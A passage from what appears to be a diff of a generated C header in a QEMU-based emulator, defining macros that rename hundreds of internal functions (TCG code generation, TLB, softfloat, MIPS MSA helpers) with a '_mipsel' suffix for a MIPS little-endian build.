stw_be_phys_mipsel +#define stw_he_p stw_he_p_mipsel +#define stw_le_p stw_le_p_mipsel +#define stw_le_phys stw_le_phys_mipsel +#define stw_phys stw_phys_mipsel +#define stw_phys_internal stw_phys_internal_mipsel +#define sub128 sub128_mipsel +#define sub16_sat sub16_sat_mipsel +#define sub16_usat sub16_usat_mipsel +#define sub192 sub192_mipsel +#define sub8_sat sub8_sat_mipsel +#define sub8_usat sub8_usat_mipsel +#define subFloat128Sigs subFloat128Sigs_mipsel +#define subFloat32Sigs subFloat32Sigs_mipsel +#define subFloat64Sigs subFloat64Sigs_mipsel +#define subFloatx80Sigs subFloatx80Sigs_mipsel +#define subpage_accepts subpage_accepts_mipsel +#define subpage_init subpage_init_mipsel +#define subpage_ops subpage_ops_mipsel +#define subpage_read subpage_read_mipsel +#define subpage_register subpage_register_mipsel +#define subpage_write subpage_write_mipsel +#define suffix_mul suffix_mul_mipsel +#define swap_commutative swap_commutative_mipsel +#define swap_commutative2 swap_commutative2_mipsel +#define switch_mode switch_mode_mipsel +#define switch_v7m_sp switch_v7m_sp_mipsel +#define syn_aa32_bkpt syn_aa32_bkpt_mipsel +#define syn_aa32_hvc syn_aa32_hvc_mipsel +#define syn_aa32_smc syn_aa32_smc_mipsel +#define syn_aa32_svc syn_aa32_svc_mipsel +#define syn_breakpoint syn_breakpoint_mipsel +#define sync_globals sync_globals_mipsel +#define syn_cp14_rrt_trap syn_cp14_rrt_trap_mipsel +#define syn_cp14_rt_trap syn_cp14_rt_trap_mipsel +#define syn_cp15_rrt_trap syn_cp15_rrt_trap_mipsel +#define syn_cp15_rt_trap syn_cp15_rt_trap_mipsel +#define syn_data_abort syn_data_abort_mipsel +#define syn_fp_access_trap syn_fp_access_trap_mipsel +#define syn_insn_abort syn_insn_abort_mipsel +#define syn_swstep syn_swstep_mipsel +#define syn_uncategorized syn_uncategorized_mipsel +#define syn_watchpoint syn_watchpoint_mipsel +#define syscall_err syscall_err_mipsel +#define system_bus_class_init system_bus_class_init_mipsel +#define system_bus_info system_bus_info_mipsel +#define t2ee_cp_reginfo t2ee_cp_reginfo_mipsel +#define table_logic_cc table_logic_cc_mipsel +#define target_parse_constraint target_parse_constraint_mipsel +#define target_words_bigendian target_words_bigendian_mipsel +#define tb_add_jump tb_add_jump_mipsel +#define tb_alloc tb_alloc_mipsel +#define tb_alloc_page tb_alloc_page_mipsel +#define tb_check_watchpoint tb_check_watchpoint_mipsel +#define tb_find_fast tb_find_fast_mipsel +#define tb_find_pc tb_find_pc_mipsel +#define tb_find_slow tb_find_slow_mipsel +#define tb_flush tb_flush_mipsel +#define tb_flush_jmp_cache tb_flush_jmp_cache_mipsel +#define tb_free tb_free_mipsel +#define tb_gen_code tb_gen_code_mipsel +#define tb_hash_remove tb_hash_remove_mipsel +#define tb_invalidate_phys_addr tb_invalidate_phys_addr_mipsel +#define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_mipsel +#define tb_invalidate_phys_range tb_invalidate_phys_range_mipsel +#define tb_jmp_cache_hash_func tb_jmp_cache_hash_func_mipsel +#define tb_jmp_cache_hash_page tb_jmp_cache_hash_page_mipsel +#define tb_jmp_remove tb_jmp_remove_mipsel +#define tb_link_page tb_link_page_mipsel +#define tb_page_remove tb_page_remove_mipsel +#define tb_phys_hash_func tb_phys_hash_func_mipsel +#define tb_phys_invalidate tb_phys_invalidate_mipsel +#define tb_reset_jump tb_reset_jump_mipsel +#define tb_set_jmp_target tb_set_jmp_target_mipsel +#define tcg_accel_class_init tcg_accel_class_init_mipsel +#define tcg_accel_type tcg_accel_type_mipsel +#define tcg_add_param_i32 tcg_add_param_i32_mipsel +#define tcg_add_param_i64 tcg_add_param_i64_mipsel +#define tcg_add_target_add_op_defs tcg_add_target_add_op_defs_mipsel +#define tcg_allowed tcg_allowed_mipsel +#define tcg_canonicalize_memop tcg_canonicalize_memop_mipsel +#define tcg_commit tcg_commit_mipsel +#define tcg_cond_to_jcc tcg_cond_to_jcc_mipsel +#define tcg_constant_folding tcg_constant_folding_mipsel +#define tcg_const_i32 tcg_const_i32_mipsel +#define tcg_const_i64 tcg_const_i64_mipsel +#define tcg_const_local_i32 tcg_const_local_i32_mipsel +#define tcg_const_local_i64 tcg_const_local_i64_mipsel +#define tcg_context_init tcg_context_init_mipsel +#define tcg_cpu_address_space_init tcg_cpu_address_space_init_mipsel +#define tcg_cpu_exec tcg_cpu_exec_mipsel +#define tcg_current_code_size tcg_current_code_size_mipsel +#define tcg_dump_info tcg_dump_info_mipsel +#define tcg_dump_ops tcg_dump_ops_mipsel +#define tcg_exec_all tcg_exec_all_mipsel +#define tcg_find_helper tcg_find_helper_mipsel +#define tcg_func_start tcg_func_start_mipsel +#define tcg_gen_abs_i32 tcg_gen_abs_i32_mipsel +#define tcg_gen_add2_i32 tcg_gen_add2_i32_mipsel +#define tcg_gen_add_i32 tcg_gen_add_i32_mipsel +#define tcg_gen_add_i64 tcg_gen_add_i64_mipsel +#define tcg_gen_addi_i32 tcg_gen_addi_i32_mipsel +#define tcg_gen_addi_i64 tcg_gen_addi_i64_mipsel +#define tcg_gen_andc_i32 tcg_gen_andc_i32_mipsel +#define tcg_gen_and_i32 tcg_gen_and_i32_mipsel +#define tcg_gen_and_i64 tcg_gen_and_i64_mipsel +#define tcg_gen_andi_i32 tcg_gen_andi_i32_mipsel +#define tcg_gen_andi_i64 tcg_gen_andi_i64_mipsel +#define tcg_gen_br tcg_gen_br_mipsel +#define tcg_gen_brcond_i32 tcg_gen_brcond_i32_mipsel +#define tcg_gen_brcond_i64 tcg_gen_brcond_i64_mipsel +#define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_mipsel +#define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_mipsel +#define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_mipsel +#define tcg_gen_callN tcg_gen_callN_mipsel +#define tcg_gen_code tcg_gen_code_mipsel +#define tcg_gen_code_common tcg_gen_code_common_mipsel +#define tcg_gen_code_search_pc tcg_gen_code_search_pc_mipsel +#define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_mipsel +#define tcg_gen_debug_insn_start tcg_gen_debug_insn_start_mipsel +#define tcg_gen_deposit_i32 tcg_gen_deposit_i32_mipsel +#define tcg_gen_exit_tb tcg_gen_exit_tb_mipsel +#define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_mipsel +#define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_mipsel +#define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_mipsel +#define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_mipsel +#define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_mipsel +#define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_mipsel +#define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_mipsel +#define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_mipsel +#define tcg_gen_goto_tb tcg_gen_goto_tb_mipsel +#define tcg_gen_ld_i32 tcg_gen_ld_i32_mipsel +#define tcg_gen_ld_i64 tcg_gen_ld_i64_mipsel +#define tcg_gen_ldst_op_i32 tcg_gen_ldst_op_i32_mipsel +#define tcg_gen_ldst_op_i64 tcg_gen_ldst_op_i64_mipsel +#define tcg_gen_movcond_i32 tcg_gen_movcond_i32_mipsel +#define tcg_gen_movcond_i64 tcg_gen_movcond_i64_mipsel +#define tcg_gen_mov_i32 tcg_gen_mov_i32_mipsel +#define tcg_gen_mov_i64 tcg_gen_mov_i64_mipsel +#define tcg_gen_movi_i32 tcg_gen_movi_i32_mipsel +#define tcg_gen_movi_i64 tcg_gen_movi_i64_mipsel +#define tcg_gen_mul_i32 tcg_gen_mul_i32_mipsel +#define tcg_gen_muls2_i32 tcg_gen_muls2_i32_mipsel +#define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_mipsel +#define tcg_gen_neg_i32 tcg_gen_neg_i32_mipsel +#define tcg_gen_neg_i64 tcg_gen_neg_i64_mipsel +#define tcg_gen_not_i32 tcg_gen_not_i32_mipsel +#define tcg_gen_op0 tcg_gen_op0_mipsel +#define tcg_gen_op1i tcg_gen_op1i_mipsel +#define tcg_gen_op2_i32 tcg_gen_op2_i32_mipsel +#define tcg_gen_op2_i64 tcg_gen_op2_i64_mipsel +#define tcg_gen_op2i_i32 tcg_gen_op2i_i32_mipsel +#define tcg_gen_op2i_i64 tcg_gen_op2i_i64_mipsel +#define tcg_gen_op3_i32 tcg_gen_op3_i32_mipsel +#define tcg_gen_op3_i64 tcg_gen_op3_i64_mipsel +#define tcg_gen_op4_i32 tcg_gen_op4_i32_mipsel +#define tcg_gen_op4i_i32 tcg_gen_op4i_i32_mipsel +#define tcg_gen_op4ii_i32 tcg_gen_op4ii_i32_mipsel +#define tcg_gen_op4ii_i64 tcg_gen_op4ii_i64_mipsel +#define tcg_gen_op5ii_i32 tcg_gen_op5ii_i32_mipsel +#define tcg_gen_op6_i32 tcg_gen_op6_i32_mipsel +#define tcg_gen_op6i_i32 tcg_gen_op6i_i32_mipsel +#define tcg_gen_op6i_i64 tcg_gen_op6i_i64_mipsel +#define tcg_gen_orc_i32 tcg_gen_orc_i32_mipsel +#define tcg_gen_or_i32 tcg_gen_or_i32_mipsel +#define tcg_gen_or_i64 tcg_gen_or_i64_mipsel +#define tcg_gen_ori_i32 tcg_gen_ori_i32_mipsel +#define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_mipsel +#define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_mipsel +#define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_mipsel +#define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_mipsel +#define tcg_gen_rotl_i32 tcg_gen_rotl_i32_mipsel +#define tcg_gen_rotli_i32 tcg_gen_rotli_i32_mipsel +#define tcg_gen_rotr_i32 tcg_gen_rotr_i32_mipsel +#define tcg_gen_rotri_i32 tcg_gen_rotri_i32_mipsel +#define tcg_gen_sar_i32 tcg_gen_sar_i32_mipsel +#define tcg_gen_sari_i32 tcg_gen_sari_i32_mipsel +#define tcg_gen_setcond_i32 tcg_gen_setcond_i32_mipsel +#define tcg_gen_shl_i32 tcg_gen_shl_i32_mipsel +#define tcg_gen_shl_i64 tcg_gen_shl_i64_mipsel +#define tcg_gen_shli_i32 tcg_gen_shli_i32_mipsel +#define tcg_gen_shli_i64 tcg_gen_shli_i64_mipsel +#define tcg_gen_shr_i32 tcg_gen_shr_i32_mipsel +#define tcg_gen_shifti_i64 tcg_gen_shifti_i64_mipsel +#define tcg_gen_shr_i64 tcg_gen_shr_i64_mipsel +#define tcg_gen_shri_i32 tcg_gen_shri_i32_mipsel +#define tcg_gen_shri_i64 tcg_gen_shri_i64_mipsel +#define tcg_gen_st_i32 tcg_gen_st_i32_mipsel +#define tcg_gen_st_i64 tcg_gen_st_i64_mipsel +#define tcg_gen_sub_i32 tcg_gen_sub_i32_mipsel +#define tcg_gen_sub_i64 tcg_gen_sub_i64_mipsel +#define tcg_gen_subi_i32 tcg_gen_subi_i32_mipsel +#define tcg_gen_trunc_i64_i32 tcg_gen_trunc_i64_i32_mipsel +#define tcg_gen_trunc_shr_i64_i32 tcg_gen_trunc_shr_i64_i32_mipsel +#define tcg_gen_xor_i32 tcg_gen_xor_i32_mipsel +#define tcg_gen_xor_i64 tcg_gen_xor_i64_mipsel +#define tcg_gen_xori_i32 tcg_gen_xori_i32_mipsel +#define tcg_get_arg_str_i32 tcg_get_arg_str_i32_mipsel +#define tcg_get_arg_str_i64 tcg_get_arg_str_i64_mipsel +#define tcg_get_arg_str_idx tcg_get_arg_str_idx_mipsel +#define tcg_global_mem_new_i32 tcg_global_mem_new_i32_mipsel +#define tcg_global_mem_new_i64 tcg_global_mem_new_i64_mipsel +#define tcg_global_mem_new_internal tcg_global_mem_new_internal_mipsel +#define tcg_global_reg_new_i32 tcg_global_reg_new_i32_mipsel +#define tcg_global_reg_new_i64 tcg_global_reg_new_i64_mipsel +#define tcg_global_reg_new_internal tcg_global_reg_new_internal_mipsel +#define tcg_handle_interrupt tcg_handle_interrupt_mipsel +#define tcg_init tcg_init_mipsel +#define tcg_invert_cond tcg_invert_cond_mipsel +#define tcg_la_bb_end tcg_la_bb_end_mipsel +#define tcg_la_br_end tcg_la_br_end_mipsel +#define tcg_la_func_end tcg_la_func_end_mipsel +#define tcg_liveness_analysis tcg_liveness_analysis_mipsel +#define tcg_malloc tcg_malloc_mipsel +#define tcg_malloc_internal tcg_malloc_internal_mipsel +#define tcg_op_defs_org tcg_op_defs_org_mipsel +#define tcg_opt_gen_mov tcg_opt_gen_mov_mipsel +#define tcg_opt_gen_movi tcg_opt_gen_movi_mipsel +#define tcg_optimize tcg_optimize_mipsel +#define tcg_out16 tcg_out16_mipsel +#define tcg_out32 tcg_out32_mipsel +#define tcg_out64 tcg_out64_mipsel +#define tcg_out8 tcg_out8_mipsel +#define tcg_out_addi tcg_out_addi_mipsel +#define tcg_out_branch tcg_out_branch_mipsel +#define tcg_out_brcond32 tcg_out_brcond32_mipsel +#define tcg_out_brcond64 tcg_out_brcond64_mipsel +#define tcg_out_bswap32 tcg_out_bswap32_mipsel +#define tcg_out_bswap64 tcg_out_bswap64_mipsel +#define tcg_out_call tcg_out_call_mipsel +#define tcg_out_cmp tcg_out_cmp_mipsel +#define tcg_out_ext16s tcg_out_ext16s_mipsel +#define tcg_out_ext16u tcg_out_ext16u_mipsel +#define tcg_out_ext32s tcg_out_ext32s_mipsel +#define tcg_out_ext32u tcg_out_ext32u_mipsel +#define tcg_out_ext8s tcg_out_ext8s_mipsel +#define tcg_out_ext8u tcg_out_ext8u_mipsel +#define tcg_out_jmp tcg_out_jmp_mipsel +#define tcg_out_jxx tcg_out_jxx_mipsel +#define tcg_out_label tcg_out_label_mipsel +#define tcg_out_ld tcg_out_ld_mipsel +#define tcg_out_modrm tcg_out_modrm_mipsel +#define tcg_out_modrm_offset tcg_out_modrm_offset_mipsel +#define tcg_out_modrm_sib_offset tcg_out_modrm_sib_offset_mipsel +#define tcg_out_mov tcg_out_mov_mipsel +#define tcg_out_movcond32 tcg_out_movcond32_mipsel +#define tcg_out_movcond64 tcg_out_movcond64_mipsel +#define tcg_out_movi tcg_out_movi_mipsel +#define tcg_out_op tcg_out_op_mipsel +#define tcg_out_pop tcg_out_pop_mipsel +#define tcg_out_push tcg_out_push_mipsel +#define tcg_out_qemu_ld tcg_out_qemu_ld_mipsel +#define tcg_out_qemu_ld_direct tcg_out_qemu_ld_direct_mipsel +#define tcg_out_qemu_ld_slow_path tcg_out_qemu_ld_slow_path_mipsel +#define tcg_out_qemu_st tcg_out_qemu_st_mipsel +#define tcg_out_qemu_st_direct tcg_out_qemu_st_direct_mipsel +#define tcg_out_qemu_st_slow_path tcg_out_qemu_st_slow_path_mipsel +#define tcg_out_reloc tcg_out_reloc_mipsel +#define tcg_out_rolw_8 tcg_out_rolw_8_mipsel +#define tcg_out_setcond32 tcg_out_setcond32_mipsel +#define tcg_out_setcond64 tcg_out_setcond64_mipsel +#define tcg_out_shifti tcg_out_shifti_mipsel +#define tcg_out_st tcg_out_st_mipsel +#define tcg_out_tb_finalize tcg_out_tb_finalize_mipsel +#define tcg_out_tb_init tcg_out_tb_init_mipsel +#define tcg_out_tlb_load tcg_out_tlb_load_mipsel +#define tcg_out_vex_modrm tcg_out_vex_modrm_mipsel +#define tcg_patch32 tcg_patch32_mipsel +#define tcg_patch8 tcg_patch8_mipsel +#define tcg_pcrel_diff tcg_pcrel_diff_mipsel +#define tcg_pool_reset tcg_pool_reset_mipsel +#define tcg_prologue_init tcg_prologue_init_mipsel +#define tcg_ptr_byte_diff tcg_ptr_byte_diff_mipsel +#define tcg_reg_alloc tcg_reg_alloc_mipsel +#define tcg_reg_alloc_bb_end tcg_reg_alloc_bb_end_mipsel +#define tcg_reg_alloc_call tcg_reg_alloc_call_mipsel +#define tcg_reg_alloc_mov tcg_reg_alloc_mov_mipsel +#define tcg_reg_alloc_movi tcg_reg_alloc_movi_mipsel +#define tcg_reg_alloc_op tcg_reg_alloc_op_mipsel +#define tcg_reg_alloc_start tcg_reg_alloc_start_mipsel +#define tcg_reg_free tcg_reg_free_mipsel +#define tcg_reg_sync tcg_reg_sync_mipsel +#define tcg_set_frame tcg_set_frame_mipsel +#define tcg_set_nop tcg_set_nop_mipsel +#define tcg_swap_cond tcg_swap_cond_mipsel +#define tcg_target_callee_save_regs tcg_target_callee_save_regs_mipsel +#define tcg_target_call_iarg_regs tcg_target_call_iarg_regs_mipsel +#define tcg_target_call_oarg_regs tcg_target_call_oarg_regs_mipsel +#define tcg_target_const_match tcg_target_const_match_mipsel +#define tcg_target_init tcg_target_init_mipsel +#define tcg_target_qemu_prologue tcg_target_qemu_prologue_mipsel +#define tcg_target_reg_alloc_order tcg_target_reg_alloc_order_mipsel +#define tcg_temp_alloc tcg_temp_alloc_mipsel +#define tcg_temp_free_i32 tcg_temp_free_i32_mipsel +#define tcg_temp_free_i64 tcg_temp_free_i64_mipsel +#define tcg_temp_free_internal tcg_temp_free_internal_mipsel +#define tcg_temp_local_new_i32 tcg_temp_local_new_i32_mipsel +#define tcg_temp_local_new_i64 tcg_temp_local_new_i64_mipsel +#define tcg_temp_new_i32 tcg_temp_new_i32_mipsel +#define tcg_temp_new_i64 tcg_temp_new_i64_mipsel +#define tcg_temp_new_internal tcg_temp_new_internal_mipsel +#define tcg_temp_new_internal_i32 tcg_temp_new_internal_i32_mipsel +#define tcg_temp_new_internal_i64 tcg_temp_new_internal_i64_mipsel +#define tdb_hash tdb_hash_mipsel +#define teecr_write teecr_write_mipsel +#define teehbr_access teehbr_access_mipsel +#define temp_allocate_frame temp_allocate_frame_mipsel +#define temp_dead temp_dead_mipsel +#define temps_are_copies temps_are_copies_mipsel +#define temp_save temp_save_mipsel +#define temp_sync temp_sync_mipsel +#define tgen_arithi tgen_arithi_mipsel +#define tgen_arithr tgen_arithr_mipsel +#define thumb2_logic_op thumb2_logic_op_mipsel +#define ti925t_initfn ti925t_initfn_mipsel +#define tlb_add_large_page tlb_add_large_page_mipsel +#define tlb_flush_entry tlb_flush_entry_mipsel +#define tlbi_aa64_asid_is_write tlbi_aa64_asid_is_write_mipsel +#define tlbi_aa64_asid_write tlbi_aa64_asid_write_mipsel +#define tlbi_aa64_vaa_is_write tlbi_aa64_vaa_is_write_mipsel +#define tlbi_aa64_vaa_write tlbi_aa64_vaa_write_mipsel +#define tlbi_aa64_va_is_write tlbi_aa64_va_is_write_mipsel +#define tlbi_aa64_va_write tlbi_aa64_va_write_mipsel +#define tlbiall_is_write tlbiall_is_write_mipsel +#define tlbiall_write tlbiall_write_mipsel +#define tlbiasid_is_write tlbiasid_is_write_mipsel +#define tlbiasid_write tlbiasid_write_mipsel +#define tlbimvaa_is_write tlbimvaa_is_write_mipsel +#define tlbimvaa_write tlbimvaa_write_mipsel +#define tlbimva_is_write tlbimva_is_write_mipsel +#define tlbimva_write tlbimva_write_mipsel +#define tlb_is_dirty_ram tlb_is_dirty_ram_mipsel +#define tlb_protect_code tlb_protect_code_mipsel +#define tlb_reset_dirty_range tlb_reset_dirty_range_mipsel +#define tlb_reset_dirty_range_all tlb_reset_dirty_range_all_mipsel +#define tlb_set_dirty tlb_set_dirty_mipsel +#define tlb_set_dirty1 tlb_set_dirty1_mipsel +#define tlb_unprotect_code_phys tlb_unprotect_code_phys_mipsel +#define tlb_vaddr_to_host tlb_vaddr_to_host_mipsel +#define token_get_type token_get_type_mipsel +#define token_get_value token_get_value_mipsel +#define token_is_escape token_is_escape_mipsel +#define token_is_keyword token_is_keyword_mipsel +#define token_is_operator token_is_operator_mipsel +#define tokens_append_from_iter tokens_append_from_iter_mipsel +#define to_qiv to_qiv_mipsel +#define to_qov to_qov_mipsel +#define tosa_init tosa_init_mipsel +#define tosa_machine_init tosa_machine_init_mipsel +#define tswap32 tswap32_mipsel +#define tswap64 tswap64_mipsel +#define type_class_get_size type_class_get_size_mipsel +#define type_get_by_name type_get_by_name_mipsel +#define type_get_parent type_get_parent_mipsel +#define type_has_parent type_has_parent_mipsel +#define type_initialize type_initialize_mipsel +#define type_initialize_interface type_initialize_interface_mipsel +#define type_is_ancestor type_is_ancestor_mipsel +#define type_new type_new_mipsel +#define type_object_get_size type_object_get_size_mipsel +#define type_register_internal type_register_internal_mipsel +#define type_table_add type_table_add_mipsel +#define type_table_get type_table_get_mipsel +#define type_table_lookup type_table_lookup_mipsel +#define uint16_to_float32 uint16_to_float32_mipsel +#define uint16_to_float64 uint16_to_float64_mipsel +#define uint32_to_float32 uint32_to_float32_mipsel +#define uint32_to_float64 uint32_to_float64_mipsel +#define uint64_to_float128 uint64_to_float128_mipsel +#define uint64_to_float32 uint64_to_float32_mipsel +#define uint64_to_float64 uint64_to_float64_mipsel +#define unassigned_io_ops unassigned_io_ops_mipsel +#define unassigned_io_read unassigned_io_read_mipsel +#define unassigned_io_write unassigned_io_write_mipsel +#define unassigned_mem_accepts unassigned_mem_accepts_mipsel +#define unassigned_mem_ops unassigned_mem_ops_mipsel +#define unassigned_mem_read unassigned_mem_read_mipsel +#define unassigned_mem_write unassigned_mem_write_mipsel +#define update_spsel update_spsel_mipsel +#define v6_cp_reginfo v6_cp_reginfo_mipsel +#define v6k_cp_reginfo v6k_cp_reginfo_mipsel +#define v7_cp_reginfo v7_cp_reginfo_mipsel +#define v7mp_cp_reginfo v7mp_cp_reginfo_mipsel +#define v7m_pop v7m_pop_mipsel +#define v7m_push v7m_push_mipsel +#define v8_cp_reginfo v8_cp_reginfo_mipsel +#define v8_el2_cp_reginfo v8_el2_cp_reginfo_mipsel +#define v8_el3_cp_reginfo v8_el3_cp_reginfo_mipsel +#define v8_el3_no_el2_cp_reginfo v8_el3_no_el2_cp_reginfo_mipsel +#define vapa_cp_reginfo vapa_cp_reginfo_mipsel +#define vbar_write vbar_write_mipsel +#define vfp_exceptbits_from_host vfp_exceptbits_from_host_mipsel +#define vfp_exceptbits_to_host vfp_exceptbits_to_host_mipsel +#define vfp_get_fpcr vfp_get_fpcr_mipsel +#define vfp_get_fpscr vfp_get_fpscr_mipsel +#define vfp_get_fpsr vfp_get_fpsr_mipsel +#define vfp_reg_offset vfp_reg_offset_mipsel +#define vfp_set_fpcr vfp_set_fpcr_mipsel +#define vfp_set_fpscr vfp_set_fpscr_mipsel +#define vfp_set_fpsr vfp_set_fpsr_mipsel +#define visit_end_implicit_struct visit_end_implicit_struct_mipsel +#define visit_end_list visit_end_list_mipsel +#define visit_end_struct visit_end_struct_mipsel +#define visit_end_union visit_end_union_mipsel +#define visit_get_next_type visit_get_next_type_mipsel +#define visit_next_list visit_next_list_mipsel +#define visit_optional visit_optional_mipsel +#define visit_start_implicit_struct visit_start_implicit_struct_mipsel +#define visit_start_list visit_start_list_mipsel +#define visit_start_struct visit_start_struct_mipsel +#define visit_start_union visit_start_union_mipsel +#define vmsa_cp_reginfo vmsa_cp_reginfo_mipsel +#define vmsa_tcr_el1_write vmsa_tcr_el1_write_mipsel +#define vmsa_ttbcr_raw_write vmsa_ttbcr_raw_write_mipsel +#define vmsa_ttbcr_reset vmsa_ttbcr_reset_mipsel +#define vmsa_ttbcr_write vmsa_ttbcr_write_mipsel +#define vmsa_ttbr_write vmsa_ttbr_write_mipsel +#define write_cpustate_to_list write_cpustate_to_list_mipsel +#define write_list_to_cpustate write_list_to_cpustate_mipsel +#define write_raw_cp_reg write_raw_cp_reg_mipsel +#define X86CPURegister32_lookup X86CPURegister32_lookup_mipsel +#define x86_op_defs x86_op_defs_mipsel +#define xpsr_read xpsr_read_mipsel +#define xpsr_write xpsr_write_mipsel +#define xscale_cpar_write xscale_cpar_write_mipsel +#define xscale_cp_reginfo xscale_cp_reginfo_mipsel +#define cpu_mips_exec cpu_mips_exec_mipsel +#define cpu_mips_get_random cpu_mips_get_random_mipsel +#define cpu_mips_get_count cpu_mips_get_count_mipsel +#define cpu_mips_store_count cpu_mips_store_count_mipsel +#define cpu_mips_store_compare cpu_mips_store_compare_mipsel +#define cpu_mips_start_count cpu_mips_start_count_mipsel +#define cpu_mips_stop_count cpu_mips_stop_count_mipsel +#define mips_machine_init mips_machine_init_mipsel +#define cpu_mips_kseg0_to_phys cpu_mips_kseg0_to_phys_mipsel +#define cpu_mips_phys_to_kseg0 cpu_mips_phys_to_kseg0_mipsel +#define cpu_mips_kvm_um_phys_to_kseg0 cpu_mips_kvm_um_phys_to_kseg0_mipsel +#define mips_cpu_register_types mips_cpu_register_types_mipsel +#define cpu_mips_init cpu_mips_init_mipsel +#define cpu_state_reset cpu_state_reset_mipsel +#define helper_msa_andi_b helper_msa_andi_b_mipsel +#define helper_msa_ori_b helper_msa_ori_b_mipsel +#define helper_msa_nori_b helper_msa_nori_b_mipsel +#define helper_msa_xori_b helper_msa_xori_b_mipsel +#define helper_msa_bmnzi_b helper_msa_bmnzi_b_mipsel +#define helper_msa_bmzi_b helper_msa_bmzi_b_mipsel +#define helper_msa_bseli_b helper_msa_bseli_b_mipsel +#define helper_msa_shf_df helper_msa_shf_df_mipsel +#define helper_msa_and_v helper_msa_and_v_mipsel +#define helper_msa_or_v helper_msa_or_v_mipsel +#define helper_msa_nor_v helper_msa_nor_v_mipsel +#define helper_msa_xor_v helper_msa_xor_v_mipsel +#define helper_msa_bmnz_v helper_msa_bmnz_v_mipsel +#define helper_msa_bmz_v helper_msa_bmz_v_mipsel +#define helper_msa_bsel_v helper_msa_bsel_v_mipsel +#define helper_msa_addvi_df helper_msa_addvi_df_mipsel +#define helper_msa_subvi_df helper_msa_subvi_df_mipsel +#define helper_msa_ceqi_df helper_msa_ceqi_df_mipsel +#define helper_msa_clei_s_df helper_msa_clei_s_df_mipsel +#define helper_msa_clei_u_df helper_msa_clei_u_df_mipsel +#define helper_msa_clti_s_df helper_msa_clti_s_df_mipsel +#define helper_msa_clti_u_df helper_msa_clti_u_df_mipsel +#define helper_msa_maxi_s_df helper_msa_maxi_s_df_mipsel +#define helper_msa_maxi_u_df helper_msa_maxi_u_df_mipsel +#define helper_msa_mini_s_df helper_msa_mini_s_df_mipsel +#define helper_msa_mini_u_df helper_msa_mini_u_df_mipsel +#define helper_msa_ldi_df helper_msa_ldi_df_mipsel +#define helper_msa_slli_df helper_msa_slli_df_mipsel +#define helper_msa_srai_df helper_msa_srai_df_mipsel +#define helper_msa_srli_df helper_msa_srli_df_mipsel +#define helper_msa_bclri_df helper_msa_bclri_df_mipsel +#define helper_msa_bseti_df helper_msa_bseti_df_mipsel +#define helper_msa_bnegi_df helper_msa_bnegi_df_mipsel +#define helper_msa_sat_s_df helper_msa_sat_s_df_mipsel +#define helper_msa_sat_u_df helper_msa_sat_u_df_mipsel +#define helper_msa_srari_df helper_msa_srari_df_mipsel +#define helper_msa_srlri_df helper_msa_srlri_df_mipsel +#define helper_msa_binsli_df helper_msa_binsli_df_mipsel +#define helper_msa_binsri_df helper_msa_binsri_df_mipsel +#define helper_msa_sll_df helper_msa_sll_df_mipsel +#define helper_msa_sra_df helper_msa_sra_df_mipsel +#define helper_msa_srl_df helper_msa_srl_df_mipsel +#define helper_msa_bclr_df helper_msa_bclr_df_mipsel +#define helper_msa_bset_df helper_msa_bset_df_mipsel +#define helper_msa_bneg_df helper_msa_bneg_df_mipsel +#define helper_msa_addv_df helper_msa_addv_df_mipsel +#define helper_msa_subv_df helper_msa_subv_df_mipsel +#define helper_msa_max_s_df helper_msa_max_s_df_mipsel +#define helper_msa_max_u_df helper_msa_max_u_df_mipsel +#define helper_msa_min_s_df helper_msa_min_s_df_mipsel +#define helper_msa_min_u_df helper_msa_min_u_df_mipsel +#define helper_msa_max_a_df helper_msa_max_a_df_mipsel +#define helper_msa_min_a_df helper_msa_min_a_df_mipsel +#define helper_msa_ceq_df helper_msa_ceq_df_mipsel +#define helper_msa_clt_s_df helper_msa_clt_s_df_mipsel +#define helper_msa_clt_u_df helper_msa_clt_u_df_mipsel +#define helper_msa_cle_s_df helper_msa_cle_s_df_mipsel +#define helper_msa_cle_u_df helper_msa_cle_u_df_mipsel +#define helper_msa_add_a_df helper_msa_add_a_df_mipsel +#define helper_msa_adds_a_df helper_msa_adds_a_df_mipsel +#define helper_msa_adds_s_df helper_msa_adds_s_df_mipsel +#define helper_msa_adds_u_df helper_msa_adds_u_df_mipsel +#define helper_msa_ave_s_df helper_msa_ave_s_df_mipsel +#define helper_msa_ave_u_df helper_msa_ave_u_df_mipsel +#define helper_msa_aver_s_df helper_msa_aver_s_df_mipsel +#define helper_msa_aver_u_df helper_msa_aver_u_df_mipsel +#define helper_msa_subs_s_df helper_msa_subs_s_df_mipsel +#define helper_msa_subs_u_df helper_msa_subs_u_df_mipsel +#define helper_msa_subsus_u_df helper_msa_subsus_u_df_mipsel +#define helper_msa_subsuu_s_df helper_msa_subsuu_s_df_mipsel +#define helper_msa_asub_s_df helper_msa_asub_s_df_mipsel +#define helper_msa_asub_u_df helper_msa_asub_u_df_mipsel +#define helper_msa_mulv_df helper_msa_mulv_df_mipsel +#define helper_msa_div_s_df helper_msa_div_s_df_mipsel +#define helper_msa_div_u_df helper_msa_div_u_df_mipsel +#define helper_msa_mod_s_df helper_msa_mod_s_df_mipsel +#define helper_msa_mod_u_df helper_msa_mod_u_df_mipsel +#define helper_msa_dotp_s_df helper_msa_dotp_s_df_mipsel +#define helper_msa_dotp_u_df helper_msa_dotp_u_df_mipsel +#define helper_msa_srar_df helper_msa_srar_df_mipsel +#define helper_msa_srlr_df helper_msa_srlr_df_mipsel +#define helper_msa_hadd_s_df helper_msa_hadd_s_df_mipsel +#define helper_msa_hadd_u_df helper_msa_hadd_u_df_mipsel +#define 